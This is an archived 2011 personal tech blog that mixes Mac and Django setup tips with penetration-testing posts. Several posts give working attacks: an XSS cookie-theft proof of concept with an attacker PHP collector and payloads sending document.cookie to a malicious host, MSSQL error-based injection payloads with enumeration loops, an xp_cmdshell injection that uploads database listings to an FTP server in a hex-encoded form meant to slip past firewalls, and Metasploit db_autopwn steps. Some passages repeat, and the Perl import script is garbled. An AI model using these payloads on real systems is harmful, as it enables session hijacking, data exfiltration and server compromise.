Modifying one drawable when you do not want to modify another.
Tuesday, December 13, 2011
Tuesday, December 6, 2011
Monday, November 7, 2011
Saturday, November 5, 2011
Django and MySQL for Python on OSX Lion
Assuming Python and MySQL is already installed:
References:
python setup.py build
sh: mysql_config: command not found
Traceback (most recent call last):
File "setup.py", line 15, in
metadata, options = get_config()
File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 43, in get_config
libs = mysql_config("libs_r")
File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 24, in mysql_config
raise EnvironmentError("%s not found" % (mysql_config.path,))
EnvironmentError: mysql_config not found
If you are experiencing this error, follow these steps found here to resolve:
Excerpt:
In my case, I edited the setup_posix.py thusly:
# mysql_config.path = "mysql_config" mysql_config.path = "/usr/local/mysql-5.0.45-osx10.4-i686/bin/mysql_config"
Re-issue command:
python setup.py clean
ARCHFLAGS='-arch x86_64' python setup.py build
ARCHFLAGS='-arch x86_64' python setup.py install
sudo ln -s /usr/local/mysql/lib/ /usr/local/mysql/lib/mysql
Then test:
>>> import MySQLdb
Monday, September 26, 2011
Objective-C rightMouseDown event
Subclassing NSView, use the following method to invoke the right mouse down / control click event:
-(void) mouseDown:(NSEvent *)event{
if (event.modifierFlags & NSControlKeyMask)
return [self rightMouseDown:event];
}
Saturday, August 27, 2011
Wednesday, August 3, 2011
Import Nessus nbe into Mysql
Discovered this post here from Michael Holstein:
There is needed modification to get it working from 2006, here is the whole deal. Tested against BT4 (I know I'm behind). To run the script:
cat [nessus nbe file] | ./nessusimport.pl
Now, to get things set up see below. I apologize for the current formatting:
1. Create MYSQL database and create these tables:
CREATE TABLE ipmain ( idmain int(10) unsigned NOT NULL auto_increment, mainip int(10) unsigned NOT NULL default '0', lastnmap datetime NOT NULL default '0000-00-00 00:00:00', lastnessus datetime NOT NULL default '0000-00-00 00:00:00', ipowner varchar(40) default NULL, PRIMARY KEY (idmain), KEY xip (mainip) ) TYPE=MyISAM;CREATE TABLE nessusresults ( idnessus int(10) unsigned NOT NULL auto_increment, domain varchar(15) NOT NULL default '', nessushost int(10) unsigned NOT NULL default '0', service varchar(40) NOT NULL default '', scriptid int(10) unsigned NOT NULL default '0', risk tinyint(3) unsigned NOT NULL default '0', timestamp datetime NOT NULL default '0000-00-00 00:00:00', msg text, PRIMARY KEY (idnessus), KEY xidnessus (idnessus), KEY knessushost (nessushost), KEY knessushost2 (nessushost,service) ) TYPE=MyISAM;CREATE TABLE nessusstats ( idstat int(10) unsigned NOT NULL auto_increment, domain varchar(15) NOT NULL default '', nessushost int(10) unsigned NOT NULL default '0', service varchar(40) NOT NULL default '', scriptid int(10) unsigned NOT NULL default '0', risk tinyint(3) unsigned NOT NULL default '0', timestamp datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (idstat), KEY xidstat (idstat), KEY kstat (nessushost), KEY kstst2 (nessushost,service) ) TYPE=MyISAM;
----------------------
2. Create the following perl script:
#!/usr/bin/perluse Net::SMTP;use Date::Manip;our $TZ = 'US/Eastern';use DBI();#####DATABASE PARAMETERS#####$DATABASE="DB GOES HERE";$HOST="HOSTNAME GOES HERE";$USERNAME="DB USERNAME GOES HERE";$PASSWORD="DB PASSWORD GOES HERE";#connect to the database server#DBI->trace(1, "trace.log"); #uncomment to log all DBI stuff$dbh = DBI->connect("DBI:mysql:database=$DATABASE;host=$HOST",$USERNAME, $PASSWORD, {'RaiseError' => 1}) || die "Unable to connect:$dbh->errstr\n";######MAIN PROGRAM LOOP######while () {@results = split '\||\|\|';@results[6] =~ tr/;/\n/;@results[6] =~ tr/"/'/;@results[5] = "7";#print @results[6];# if(@results[6] =~ "Risk factor :\\\\n\\\\nCritical"){print @results[6];}if(@results[6] =~ "Risk factor :\\\\n\\\\nCritical") {@results[5] = '1';}if(@results[6] =~ "Risk factor :\\\\n\\\\nSerious") {@results[5] = '1';}if(@results[6] =~ "Risk factor :\\\\n\\\\nHigh") {@results[5] = '1';}if(@results[6] =~ "Risk factor :\\\\n\\\\nMedium") {@results[5] = '2';}if(@results[6] =~ "Risk factor :\\\\n\\\\nMedium/Low") {@results[5] = '2';}if(@results[6] =~ "Risk factor :\\\\n\\\\nLow/Medium") { @results[5] = '3';}if(@results[6] =~ "Risk factor :\\\\n\\\\nLow") { @results[5] = '3';}# @results[5] = '1' if (@results[6] =~ "Risk factor : Critical");# @results[5] = '1' if (@results[6] =~ "Risk factor : Serious");# @results[5] = '1' if (@results[6] =~ "Risk factor : High");# @results[5] = '2' if (@results[6] =~ "Risk factor : Medium");# @results[5] = '2' if (@results[6] =~ "Risk factor : Medium/Low");# @results[5] = '3' if (@results[6] =~ "Risk factor : Low/Medium");# @results[5] = '3' if (@results[6] =~ "Risk factor : Low");@results[6] =~ `Risk factor : Critical`;@results[6] =~ `Risk factor : High`;@results[6] =~ `Risk factor : Serious`;@results[6] =~ `Risk factor : Medium`;@results[6] =~ `Risk factor : Medium/Low`;@results[6] =~ `Risk factor : Low/Medium`;@results[6] =~ `Risk factor : Low`;for (@results[0]) { s/^\s+//;s/\s+$//; }for (@results[1]) { s/^\s+//;s/\s+$//; }for (@results[2]) { s/^\s+//;s/\s+$//; }for (@results[3]) { s/^\s+//;s/\s+$//; }for (@results[4]) { s/\for (@results[5]) { s/^\s+//;s/\s+$//; }for (@results[6]) { s/^\s+//;s/\s+$//;s/\'/\\'/g;}my $ip = &dot2dec(@results[2]);next unless ($ip > 0);$timestamp = UnixDate(@results[4], '%Y-%m-%d %H:%M:%S');&findmainip($ip);#condition 1 (entry is a timestamp for end of host scan)if (@results[0] eq "timestamps" and @results[3] =~ 'host_end|host_start') {&updatemainip($ip,$timestamp);#print "Condition 1 Matched\n";}#condition 2 (entry is a result record)#print "testing: " . @results[0] ." and results 5: ".@results[5] . "\n";if (@results[0] eq "results" and @results[5] < 7) {&findnessustimestamp($ip);&updatenessus(@results[1],$ip, @results[3], @results[4], @results[5], @nessustime[1], @results[6]);&updatestats(@results[1],$ip, @results[3], @results[4], @results[5], @nessustime[1]);}else {next;}}#####GLOBAL SUBROUTINES######turn dotted quad into decimalsub dot2dec {my $address = @_[0];($a, $b, $c, $d) = split '\.', $address;$decimal = $d + ($c * 256) + ($b * 256**2) + ($a * 256**3);return $decimal;}#turn decimal into dottedsub dec2dot {my $address = @_[0];$d = $address % 256; $address -= $d; $address /= 256;$c = $address % 256; $address -= $c; $address /= 256;$b = $address % 256; $address -= $b; $address /= 256;$a = $address;$dotted="$a.$b.$c.$d";return $dotted;}#find IP in master tablesub findmainip {my $query = $dbh->prepare("select idmain,mainip from ipmainwhere mainip = '@_[0]'");$query->execute || die "Unable to locate IP in table ipmain:$dbh->errstr\n";@mainip = $query->fetchrow_array;return @mainip;}#update/add IP×tamp in master tablesub updatemainip {my $query = $dbh->prepare("select * from ipmain wheremainip=@_[0]");$query->execute || die "Unable to locate IP in table ipmain:$dbh->errstr\n";@mainip = $query->fetchrow_array;if (@mainip[0]) {$dbh->do("update ipmain set lastnessus='@_[1]' whereidmain='@mainip[0]'") || die "problem with updatemainip 1:$dbh->errstr\n";# print "updated values lastnessus=@_[1] where idmain=@mainip[0]\n";}else {$dbh->do("insert into ipmain (mainip,lastnessus) values('@_[0]','@_[1]')") || die "problem with updatemainip 2:$dbh->errstr\n";# print "inserted values mainip=@_[0], lastnessus=@_[1]\n";}return;}#find last nessus timestamp for some IPsub findnessustimestamp {my $query = $dbh->prepare("select idmain,lastnessus from ipmainwhere mainip='@_[0]'") || die "problem with findnessustimestamp:$dbh->errstr\n";$query->execute || die "Unable to locate nessus timestamp intable ipmain: $dbh->errsrt\n";@nessustime = $query->fetchrow_array;return @nessustime;}#update/add nessus results records in nessusresults tablesub updatenessus {my $query = $dbh->prepare("select * from nessusresults where nessushost='@_[1]' and scriptid='@_[3]'") || die "problem with updatenessus 1:$dbh->errstr\n";print "prepared";$query->execute || die "Unable to locate record in NessusResults: $dbh->errstr\n";print "executed";@nessus = $query->fetchrow_array;if (@nessus[0]) {$dbh->do("update nessusresults set domain='@_[0]',nessushost='@_[1]', service='@_[2]', scriptid='@_[3]', risk='@_[4]',timestamp='@_[5]', msg='@_[6]' where idnessus='@nessus[0]'") || die"problem with updatenessus 2: $dbh->errstr\n";# print "updated values domain=@_[0], host=@_[1], service=@_[2], script=@_[3], risk=@_[4], time=@_[5], msg=@_[6]\n";}else {$dbh->do("insert into nessusresults(domain,nessushost,service,scriptid,risk,timestamp,msg) values('@_[0]','@_[1]','@_[2]','@_[3]','@_[4]','@_[5]','@_[6]')") || die"problem with updatenessus 3: $dbh->errstr\n";# print "inserted values domain=@_[0], host=@_[1], service=@_[2], script=@_[3], risk=@_[4], time=@_[5], msg=@_[6]\n";}return;}sub updatestats {$dbh->do("insert into nessusstats(domain,nessushost,service,scriptid,risk,timestamp) values('@_[0]','@_[1]','@_[2]','@_[3]','@_[4]','@_[5]')") || die "problem withupdatestats 1: $dbh->errsrt\n";# print "inserted stats values domain=@_[0], host=@_[1], service=@_[2], script=@_[3], risk=@_[4], time=@_[5]\n";return;}
Wednesday, July 13, 2011
Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0
If experiencing in Metasploit (for example utilizing MS08-067)
" Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0 "Try:
> set SMBDirect false
Tuesday, July 12, 2011
Thursday, June 16, 2011
Tuesday, May 31, 2011
Wednesday, May 25, 2011
Friday, May 6, 2011
Metasploit db_autopwn (Postgres)
Step 1: Get/view active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql
[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev
Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
...
Step 3: nmap, enumerate the services of target system(s)
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
Step 4: auto exploit
msf exploit(psexec) > db_autopwn -p -t -e -b
Monday, May 2, 2011
How to steal cookies via XSS
This is a proof of concept demonstrating the the fundamental of stealing cookies via XSS:
There are two parts:
1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.
Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"
As you can see, all the server code is take in a $_GET request, and writes the attribute 'code' from the $_GET request variable.
Part 2:
In a server that is vulnerable to XSS, input the following malicious code:
The following code creates an image with the source pointing to our malicious server. The request populates the GET variable "code" which the server is expecting to read and write.
There are two parts:
1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.
Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"
$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);
As you can see, all the server code is take in a $_GET request, and writes the attribute 'code' from the $_GET request variable.
Part 2:
In a server that is vulnerable to XSS, input the following malicious code:
<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>
or
<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>
The following code creates an image with the source pointing to our malicious server. The request populates the GET variable "code" which the server is expecting to read and write.
Monday, April 11, 2011
Thursday, April 7, 2011
Clear NSUserDefaults
The following will clear all saved preferences:
[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
Monday, April 4, 2011
MS-SQL Injection through errors
The following is a very very rough outline draft, I will fill in the details at a later date:
Sqlmap (also found on BackTrack OS) performs the following similar payload to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, thus knowing how to manually perform the injection helps.
For example, we know the following form is vulnerable to a SQL injection utilizing the following payload:
1);WAITFOR DELAY '0:0:9'--
We can proceed with the following injection techniques to generate some useful information. The following was devised after many testings:
) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--
We use 8 columns because the unknown vulnerable query is pulling 8 columns. Therefore we need to match the amount of columns. The number of columns was found through SQL injection messages.
We then substitute our qryarg with the query we are interested in.
for i in range(1,500):
qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"
This will loop through each request and enumerate the database.
Then we start enumerating table names based on the found database names:
SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC
etc with columns, then actual rows.
Sqlmap (also found on BackTrack OS) performs the following similar payload to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, thus knowing how to manually perform the injection helps.
For example, we know the following form is vulnerable to a SQL injection utilizing the following payload:
1);WAITFOR DELAY '0:0:9'--
We can proceed with the following injection techniques to generate some useful information. The following was devised after many testings:
) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--
We use 8 columns because the unknown vulnerable query is pulling 8 columns. Therefore we need to match the amount of columns. The number of columns was found through SQL injection messages.
We then substitute our qryarg with the query we are interested in.
for i in range(1,500):
qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"
This will loop through each request and enumerate the database.
Then we start enumerating table names based on the found database names:
SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC
etc with columns, then actual rows.
Wednesday, March 9, 2011
Python tricks
Small notes to myself:
chr() command is used to convert int to character. CHAR is the syntax used in MSSQL, when analyzing the query you can add an additional mapping of the command with:
>>> CHAR=chr
Now you can perform the following command:
>>>CHAR()
chr(
>>> CHAR=chr
Now you can perform the following command:
>>>CHAR(
Wednesday, March 2, 2011
SQL Injection to Compromise OS
MSSQL Injection example to communicate with FTP server. The following POC can be extended to download/upload and execute Metasploit payloads to perform backdoors and reverse tcp connections. Discovered this with a customer who was directly compromised by this very attack vector:
Requirements: MSSQL running on System level (or equivalent) privileges. Where xp_* has not been ripped out.
Here is the query in its entirety:
Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\f3.txt & rmdir /S /Q temp';--
Break down:
Step 1 : Enable xp_cmdshell which is disabled by default on many SQL servers (2005):
sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Step 2: Create temporary directory:
exec master..xp_cmdshell 'mkdir temp&
Step 3: Create preset of FTP commands for execution. We will see this in the next step.
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &
Step 4: Query MSSQL to show all Database and pipe into file.txt. FTP results to your server given the commands we created in Step 3:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--
Recap:
This command essentially create a temporary directory "temp", pipes in a preset of FTP commands to upload file file.txt. It will then run a SQL query to pipe in the list database command into the temporary file. This file is then uploaded to the FTP server via ftp -s:temp\f3.txt which is the preset FTP commands defined. Subsequent clean up at the end (rmdir).
You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.
Additionally, some trivial obfuscation to mask the query with a hex encode, store it in a variable, then pipe that variable into "exec" to bypass primitive application firewalls that may key off on basic search strings:
declare @q varchar(8000) select @q = 0x455845432073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b5245434f4e4649475552453b455845432073705f636f6e666967757265202778705f636d647368656c6c272c20313b5245434f4e4649475552453b2065786563206d61737465722e2e78705f636d647368656c6c20276d6b6469722074656d702620286563686f206f70656e206674702e6d6963726f736f66742e636f6d26206563686f207573657226206563686f2070617373776f726426206563686f2062696e61727926206563686f206c63642074656d7026206563686f207075742066696c652e7478742066696c652e74787426206563686f20627965293e74656d705c667470636f6d6d616e642e74787420262028626370202273656c656374206e616d652c646269642c6372646174652066726f6d206d61737465722e64626f2e737973646174616261736573222071756572796f757420622e747874202d63202d542026207479706520622e747874262064656c20622e74787429203e2074656d705c66696c652e74787420323e2631202620667470202d733a74656d705c66332e747874202620726d646972202f53202f512074656d70273b2d2d exec(@q)
Monday, February 28, 2011
Saturday, February 19, 2011
OSX Convert audio formats
Example of converting to .caff:
afconvert -f caff -d LEI16@44100 -c 1 [input] [output]
afconvert -f caff -d LEI16@44100 -c 1 [input] [output]
Friday, January 28, 2011
Thursday, January 27, 2011
Subscribe to:
Posts (Atom)